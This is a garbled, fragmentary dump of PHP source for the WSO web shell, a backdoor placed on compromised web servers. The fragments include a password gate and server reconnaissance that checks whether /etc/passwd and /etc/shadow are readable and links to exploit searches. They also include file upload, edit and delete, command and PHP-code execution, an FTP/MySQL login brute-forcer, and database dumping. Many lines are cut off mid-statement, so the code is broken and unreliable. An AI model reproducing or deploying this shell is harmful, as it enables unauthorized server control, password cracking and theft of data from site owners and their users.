123 (444)
 
 
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
die("
Password:
");
body{background-color: #444;color
body,td,th{ font: 9pt Lucida,Verdana;margin
table.info{ color: #fff;background-color
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left: 5px solid $color;padding
div.content{ padding: 5px;margin-left
a{ text-decoration: none; }
a: hover{ text-decoration
.ml1{ border: 1px solid #444;padding
.bigarea{ width: 100%;height
input,textarea,select{ margin: 0;color
form{ margin: 0px; }
#toolsTbl{ text-align: center; }
.toolsInp{ width: 300px }
.main th{text-align: left;background-color
.main tr: hover{background-color
.l1{background-color: #444}
.l2{background-color: #333}
pre{font-family: Courier,Monospace;}
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'': htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'': htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'': htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
none;'>
$totalSpace = $totalSpace?$totalSpace: 1;
$explink = 'http: //exploit-db.com/search/?action=search&filter_description=';
$opt_charsets .= ' '').'>'.$item.'';
if(is_dir($drive.': \\'))
$drives .= '/\')">[ '.$drive.' ] ';
echo '
Uname:
User
. '' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group:
' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode
. ' [ phpinfo ] Datetime: ' . date('Y-m-d H
. '
Server IP:

' . @$_SERVER["SERVER_ADDR"] . '
Client IP
. '2px solid #333;" cellpadding=3 cellspacing=0 width=100%>' . $menu . '
$is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)": " (Not writable)";
Change dir: ';

Read file:

Make dir:
$is_writable
Make file:
$is_writable
Execute:

'') . "'>
Upload file: $is_writable

$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' )
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' )
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' )
echo '' . $n . ': ';
wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']: 'none');
wsoSecParam('cURL support', function_exists('curl_version')?'enabled': 'no');
wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]": 'no');
wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]": 'no');
$temp .= join(': ',$uid)."\n";
echo '

PHP info

';
'!(body|a: \w+|body, td, th, h1, h2) {.*}!msiU',
echo '

Execution PHP-code

echo ' '').'> send using AJAX
case 'uploadFile':
case 'mkdir':
case 'delete':
$path = (substr($path,-1)=='/') ? $path: $path.'/';
case 'paste':
default:
$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']: $GLOBALS['cwd']);
Name date('Y-m-d H: i
'owner' => $ow['name']?$ow['name']: @fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']: @filegroup($dirContent[$i])
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1: -1);
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1
echo ' '').'>'.htmlspecialchars($f['name'])
.'R T'.(($f['type']=='file')?' E D': '').'
$l = $l?0: 1;
'')."'>
echo "file name:
echo " '')."> send using AJAX
1px solid #df5;background-color' '
echo '

Results

Type:
'.htmlspecialchars($_POST['proto']).' Server
$fp = @ftp_connect($ip, $port?$port: 21);
$res = @mysql_connect($ip.': '.($port?$port
$server = explode(": ", $_POST['server']);
$line = explode(": ", $line);
echo ''.htmlspecialchars($line[0]).': '.htmlspecialchars($line[0]).'
';
echo ''.htmlspecialchars($line[0]).': '.htmlspecialchars($tmp);
echo ''.htmlspecialchars($_POST['login']).': '.htmlspecialchars($line).'
';
echo "Attempts: $attempts Success
.'Server: port
.'
.'
15px">'
Login
case 'mysql':
case 'pgsql':
$host = explode(': ', $host);
case 'mysql':
case 'mysql':
case 'pgsql':
$res = func_num_args()?func_get_arg(0): $this->res;
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case 'mysql':
case 'pgsql':
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
'') ."'>
htmlspecialchars($_POST['sql_host'])) ."\">
htmlspecialchars($_POST['sql_login'])) ."\">
htmlspecialchars($_POST['sql_pass'])) ."\">";
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
echo ' '').'>'.$value.'';
' checked') . "> count the number of rows
echo "
Tables
echo " ".$value."" . (empty($_POST['sql_count'])?' ': " ({$n['n']})") . "
";
echo "
File path:
1;
echo '#292929">';
$line = $line==1?2: 1;
echo '
Error:
'.htmlspecialchars($db->error()).'';
echo "